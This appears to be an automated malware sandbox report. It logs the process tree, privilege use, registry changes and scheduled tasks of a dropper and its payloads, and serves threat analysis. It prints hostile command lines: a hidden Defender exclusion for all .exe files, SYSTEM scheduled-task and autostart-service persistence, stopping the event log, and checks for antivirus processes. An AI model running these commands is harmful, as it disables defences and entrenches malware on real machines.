\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5480 schtasks.exe 5404 schtasks.exe 116 schtasks.exe 4500 schtasks.exe 5860 schtasks.exe 1332 schtasks.exe 4160 schtasks.exe 3568 schtasks.exe 344 schtasks.exe 4896 schtasks.exe 5804 schtasks.exe 1152 schtasks.exe 3000 schtasks.exe 1864 schtasks.exe 1292 schtasks.exe 2536 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4608 1720605557.036432_setup.exe 4608 1720605557.036432_setup.exe 2376 XB3ki0WHFBZujbRpDk6IaoK0.exe 2376 XB3ki0WHFBZujbRpDk6IaoK0.exe 980 vGt3OVFeh3LKSHl0V_ykKREk.exe 980 vGt3OVFeh3LKSHl0V_ykKREk.exe 2200 uN3YmJE65MD_PlWriUaT7fWG.exe 2200 uN3YmJE65MD_PlWriUaT7fWG.exe 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 980 vGt3OVFeh3LKSHl0V_ykKREk.exe 980 vGt3OVFeh3LKSHl0V_ykKREk.exe 1688 powershell.exe 1688 powershell.exe 2120 powershell.exe 2120 powershell.exe 1688 powershell.exe 5184 MSBuild.exe 5184 MSBuild.exe 5204 MSBuild.exe 5204 MSBuild.exe 2120 powershell.exe 1488 RegAsm.exe 1488 RegAsm.exe 6004 IEHCBAFIDA.exe 6004 IEHCBAFIDA.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3612 Nbv2eat128G6GNOjYYnBYhR2.exe Token: SeDebugPrivilege 2376 XB3ki0WHFBZujbRpDk6IaoK0.exe Token: SeDebugPrivilege 2532 RegAsm.exe Token: SeBackupPrivilege 2532 RegAsm.exe Token: SeSecurityPrivilege 2532 RegAsm.exe Token: SeSecurityPrivilege 2532 RegAsm.exe Token: SeSecurityPrivilege 2532 RegAsm.exe Token: SeSecurityPrivilege 2532 RegAsm.exe Token: SeDebugPrivilege 5640 tasklist.exe Token: SeDebugPrivilege 5696 tasklist.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeDebugPrivilege 2120 powershell.exe Token: SeIncreaseQuotaPrivilege 5852 WMIC.exe Token: SeSecurityPrivilege 5852 WMIC.exe Token: SeTakeOwnershipPrivilege 5852 WMIC.exe Token: SeLoadDriverPrivilege 5852 WMIC.exe Token: SeSystemProfilePrivilege 5852 WMIC.exe Token: SeSystemtimePrivilege 5852 WMIC.exe Token: SeProfSingleProcessPrivilege 5852 WMIC.exe Token: SeIncBasePriorityPrivilege 5852 WMIC.exe Token: SeCreatePagefilePrivilege 5852 WMIC.exe Token: SeBackupPrivilege 5852 WMIC.exe Token: SeRestorePrivilege 5852 WMIC.exe Token: SeShutdownPrivilege 5852 WMIC.exe Token: SeDebugPrivilege 5852 WMIC.exe Token: SeSystemEnvironmentPrivilege 5852 WMIC.exe Token: SeRemoteShutdownPrivilege 5852 WMIC.exe Token: SeUndockPrivilege 5852 WMIC.exe Token: SeManageVolumePrivilege 5852 WMIC.exe Token: 33 5852 WMIC.exe Token: 34 5852 WMIC.exe Token: 35 5852 WMIC.exe Token: 36 5852 WMIC.exe Token: SeDebugPrivilege 1488 RegAsm.exe Token: SeIncreaseQuotaPrivilege 1312 WMIC.exe Token: SeSecurityPrivilege 1312 WMIC.exe Token: SeTakeOwnershipPrivilege 1312 WMIC.exe Token: SeLoadDriverPrivilege 1312 WMIC.exe Token: SeSystemProfilePrivilege 1312 WMIC.exe Token: SeSystemtimePrivilege 1312 WMIC.exe Token: SeProfSingleProcessPrivilege 1312 WMIC.exe Token: SeIncBasePriorityPrivilege 1312 WMIC.exe Token: SeCreatePagefilePrivilege 1312 WMIC.exe Token: SeBackupPrivilege 1312 WMIC.exe Token: SeRestorePrivilege 1312 WMIC.exe Token: SeShutdownPrivilege 1312 WMIC.exe Token: SeDebugPrivilege 1312 WMIC.exe Token: SeSystemEnvironmentPrivilege 1312 WMIC.exe Token: SeRemoteShutdownPrivilege 1312 WMIC.exe Token: SeUndockPrivilege 1312 WMIC.exe Token: SeManageVolumePrivilege 1312 WMIC.exe Token: 33 1312 WMIC.exe Token: 34 1312 WMIC.exe Token: 35 1312 WMIC.exe Token: 36 1312 WMIC.exe Token: SeIncreaseQuotaPrivilege 1312 WMIC.exe Token: SeSecurityPrivilege 1312 WMIC.exe Token: SeTakeOwnershipPrivilege 1312 WMIC.exe Token: SeLoadDriverPrivilege 1312 WMIC.exe Token: SeSystemProfilePrivilege 1312 WMIC.exe Token: SeSystemtimePrivilege 1312 WMIC.exe Token: SeProfSingleProcessPrivilege 1312 WMIC.exe Token: SeIncBasePriorityPrivilege 1312 WMIC.exe Token: SeCreatePagefilePrivilege 1312 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4620 nup4TOcCS6dP9db5MzHsOwiV.tmp 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 6004 IEHCBAFIDA.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5888 Valve.pif 5888 Valve.pif 5888 Valve.pif 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 3520 firefox.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe 6096 d9c692739d.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 980 vGt3OVFeh3LKSHl0V_ykKREk.exe 5764 cmd.exe 3520 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4608 wrote to memory of 3508 4608 1720605557.036432_setup.exe 95 PID 4608 wrote to memory of 3508 4608 1720605557.036432_setup.exe 95 PID 4608 wrote to memory of 3508 4608 1720605557.036432_setup.exe 95 PID 4608 wrote to memory of 4992 4608 1720605557.036432_setup.exe 96 PID 4608 wrote to memory of 4992 4608 1720605557.036432_setup.exe 96 PID 4608 wrote to memory of 4992 4608 1720605557.036432_setup.exe 96 PID 4608 wrote to memory of 2332 4608 1720605557.036432_setup.exe 97 PID 4608 wrote to memory of 2332 4608 1720605557.036432_setup.exe 97 PID 4608 wrote to memory of 2332 4608 1720605557.036432_setup.exe 97 PID 4608 wrote to memory of 1008 4608 1720605557.036432_setup.exe 98 PID 4608 wrote to memory of 1008 4608 1720605557.036432_setup.exe 98 PID 4608 wrote to memory of 2060 4608 1720605557.036432_setup.exe 100 PID 4608 wrote to memory of 2060 4608 1720605557.036432_setup.exe 100 PID 4608 wrote to memory of 2060 4608 1720605557.036432_setup.exe 100 PID 4608 wrote to memory of 4672 4608 1720605557.036432_setup.exe 99 PID 4608 wrote to memory of 4672 4608 1720605557.036432_setup.exe 99 PID 4608 wrote to memory of 4672 4608 1720605557.036432_setup.exe 99 PID 4608 wrote to memory of 4056 4608 1720605557.036432_setup.exe 94 PID 4608 wrote to memory of 4056 4608 1720605557.036432_setup.exe 94 PID 4608 wrote to memory of 4056 4608 1720605557.036432_setup.exe 94 PID 4608 wrote to memory of 980 4608 1720605557.036432_setup.exe 102 PID 4608 wrote to memory of 980 4608 1720605557.036432_setup.exe 102 PID 4608 wrote to memory of 980 4608 1720605557.036432_setup.exe 102 PID 4608 wrote to memory of 3612 4608 1720605557.036432_setup.exe 104 PID 4608 wrote to memory of 3612 4608 1720605557.036432_setup.exe 104 PID 4608 wrote to memory of 3612 4608 1720605557.036432_setup.exe 104 PID 4608 wrote to memory of 2376 4608 1720605557.036432_setup.exe 103 PID 4608 wrote to memory of 2376 4608 1720605557.036432_setup.exe 103 PID 4608 wrote to memory of 2376 4608 1720605557.036432_setup.exe 103 PID 4608 wrote to memory of 2200 4608 1720605557.036432_setup.exe 101 PID 4608 wrote to memory of 2200 4608 1720605557.036432_setup.exe 101 PID 4608 wrote to memory of 5080 4608 1720605557.036432_setup.exe 106 PID 4608 wrote to memory of 5080 4608 1720605557.036432_setup.exe 106 PID 4608 wrote to memory of 5080 4608 1720605557.036432_setup.exe 106 PID 4608 wrote to memory of 2416 4608 1720605557.036432_setup.exe 105 PID 4608 wrote to memory of 2416 4608 1720605557.036432_setup.exe 105 PID 4672 wrote to memory of 4620 4672 nup4TOcCS6dP9db5MzHsOwiV.exe 107 PID 4672 wrote to memory of 4620 4672 nup4TOcCS6dP9db5MzHsOwiV.exe 107 PID 4672 wrote to memory of 4620 4672 nup4TOcCS6dP9db5MzHsOwiV.exe 107 PID 5080 wrote to memory of 4304 5080 KAcc9RI3MiOBAHUXgUxfxdaV.exe 108 PID 5080 wrote to memory of 4304 5080 KAcc9RI3MiOBAHUXgUxfxdaV.exe 108 PID 5080 wrote to memory of 4304 5080 KAcc9RI3MiOBAHUXgUxfxdaV.exe 108 PID 4056 wrote to memory of 2176 4056 YexdmzcdPLggRapv4HZlLGD4.exe 109 PID 4056 wrote to memory of 2176 4056 YexdmzcdPLggRapv4HZlLGD4.exe 109 PID 4056 wrote to memory of 2176 4056 YexdmzcdPLggRapv4HZlLGD4.exe 109 PID 4992 wrote to memory of 2256 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 110 PID 4992 wrote to memory of 2256 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 110 PID 4992 wrote to memory of 2256 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 110 PID 4992 wrote to memory of 2284 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 173 PID 4992 wrote to memory of 2284 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 173 PID 4992 wrote to memory of 2284 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 173 PID 4992 wrote to memory of 1488 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 112 PID 4992 wrote to memory of 1488 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 112 PID 4992 wrote to memory of 1488 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 112 PID 2332 wrote to memory of 2532 2332 R2jjJpprj1ufPZ1cttEEna1Z.exe 151 PID 2332 wrote to memory of 2532 2332 R2jjJpprj1ufPZ1cttEEna1Z.exe 151 PID 2332 wrote to memory of 2532 2332 R2jjJpprj1ufPZ1cttEEna1Z.exe 151 PID 2332 wrote to memory of 2532 2332 R2jjJpprj1ufPZ1cttEEna1Z.exe 151 PID 2332 wrote to memory of 2532 2332 R2jjJpprj1ufPZ1cttEEna1Z.exe 151 PID 2332 wrote to memory of 2532 2332 R2jjJpprj1ufPZ1cttEEna1Z.exe 151 PID 2332 wrote to memory of 2532 2332 R2jjJpprj1ufPZ1cttEEna1Z.exe 151 PID 2332 wrote to memory of 2532 2332 R2jjJpprj1ufPZ1cttEEna1Z.exe 151 PID 4992 wrote to memory of 1488 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 112 PID 4992 wrote to memory of 1488 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2900
-
C:\Users\Admin\AppData\Local\Temp\1720605557.036432_setup.exe"C:\Users\Admin\AppData\Local\Temp\1720605557.036432_setup.exe"2⤵
- Modifies firewall policy service
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Users\Admin\Documents\SimpleAdobe\YexdmzcdPLggRapv4HZlLGD4.exeC:\Users\Admin\Documents\SimpleAdobe\YexdmzcdPLggRapv4HZlLGD4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Users\Admin\AppData\Local\Temp\7zS1279.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\7zS1F6A.tmp\Install.exe.\Install.exe /NOJddidPYX "525403" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:5336 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:5128
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:5096
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5852
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bMfeDuSmKBAGoOfQBS" /SC once /ST 10:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS1F6A.tmp\Install.exe\" NI /UKhdidZXTP 525403 /S" /V1 /F6⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4160
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\UGQuOY1kqdT13agDjIG0YZtu.exeC:\Users\Admin\Documents\SimpleAdobe\UGQuOY1kqdT13agDjIG0YZtu.exe3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:3508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 4644⤵
- Program crash
PID:2532
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\DxoA6Bdpb0h3bT4kFUIqeS3K.exeC:\Users\Admin\Documents\SimpleAdobe\DxoA6Bdpb0h3bT4kFUIqeS3K.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:2256
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:2284
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\R2jjJpprj1ufPZ1cttEEna1Z.exeC:\Users\Admin\Documents\SimpleAdobe\R2jjJpprj1ufPZ1cttEEna1Z.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 2804⤵
- Program crash
PID:5488
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\bjUQ36IFj2PoHA0sQz8TBXsB.exeC:\Users\Admin\Documents\SimpleAdobe\bjUQ36IFj2PoHA0sQz8TBXsB.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1008 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵PID:5464
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\nup4TOcCS6dP9db5MzHsOwiV.exeC:\Users\Admin\Documents\SimpleAdobe\nup4TOcCS6dP9db5MzHsOwiV.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Users\Admin\AppData\Local\Temp\is-U55PJ.tmp\nup4TOcCS6dP9db5MzHsOwiV.tmp"C:\Users\Admin\AppData\Local\Temp\is-U55PJ.tmp\nup4TOcCS6dP9db5MzHsOwiV.tmp" /SL5="$110042,4988381,54272,C:\Users\Admin\Documents\SimpleAdobe\nup4TOcCS6dP9db5MzHsOwiV.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4620 -
C:\Users\Admin\AppData\Local\Audio Shell\audioshell.exe"C:\Users\Admin\AppData\Local\Audio Shell\audioshell.exe" -i5⤵
- Executes dropped EXE
PID:5292
-
-
C:\Users\Admin\AppData\Local\Audio Shell\audioshell.exe"C:\Users\Admin\AppData\Local\Audio Shell\audioshell.exe" -s5⤵
- Executes dropped EXE
PID:5544
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\J6fxPfjrVIW7mWC7xutZfIbr.exeC:\Users\Admin\Documents\SimpleAdobe\J6fxPfjrVIW7mWC7xutZfIbr.exe3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Properties Properties.cmd & Properties.cmd & exit4⤵PID:1608
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5640
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:5652
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5696
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"5⤵PID:5704
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1978155⤵PID:5740
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "CARLFAMILIESPATIENTSAGED" Gaps5⤵PID:5752
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Renew 197815\D5⤵PID:5868
-
-
C:\Users\Admin\AppData\Local\Temp\197815\Valve.pif197815\Valve.pif 197815\D5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5888 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 9926⤵
- Program crash
PID:5404
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
PID:5268
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\uN3YmJE65MD_PlWriUaT7fWG.exeC:\Users\Admin\Documents\SimpleAdobe\uN3YmJE65MD_PlWriUaT7fWG.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2200 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:4328
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:32
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:1548
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:4208
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "CIFUBVHI"4⤵
- Launches sc.exe
PID:5168 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2284
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"4⤵
- Launches sc.exe
PID:2988
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3976
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "CIFUBVHI"4⤵
- Launches sc.exe
PID:5364
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\vGt3OVFeh3LKSHl0V_ykKREk.exeC:\Users\Admin\Documents\SimpleAdobe\vGt3OVFeh3LKSHl0V_ykKREk.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\IEHCBAFIDA.exe"4⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\IEHCBAFIDA.exe"C:\Users\Admin\AppData\Local\Temp\IEHCBAFIDA.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6004 -
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4288 -
C:\Users\Admin\AppData\Local\Temp\1000010001\d9c692739d.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\d9c692739d.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6096 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account8⤵PID:2848
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account9⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3520 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1940 -parentBuildID 20240401114208 -prefsHandle 1852 -prefMapHandle 1844 -prefsLen 25757 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6cb4146d-be76-407d-89e1-0b9afdeeef44} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" gpu10⤵PID:3168
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2416 -parentBuildID 20240401114208 -prefsHandle 2392 -prefMapHandle 2380 -prefsLen 26677 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db2ba6c3-6cba-469b-b3c4-eb6076ea217a} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" socket10⤵PID:1708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3240 -childID 1 -isForBrowser -prefsHandle 3232 -prefMapHandle 3228 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 612 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2c91910-9517-4744-82dd-08e38013d054} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" tab10⤵PID:5760
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3952 -childID 2 -isForBrowser -prefsHandle 3980 -prefMapHandle 3976 -prefsLen 31167 -prefMapSize 244658 -jsInitHandle 612 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f9a1809-a5b4-4148-9921-dc45aeb49938} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" tab10⤵PID:3000
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4660 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4652 -prefMapHandle 4644 -prefsLen 31167 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8b6c1e2-477c-436b-92d3-28a7b2ab5a50} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" utility10⤵
- Checks processor information in registry
PID:1252
-
-
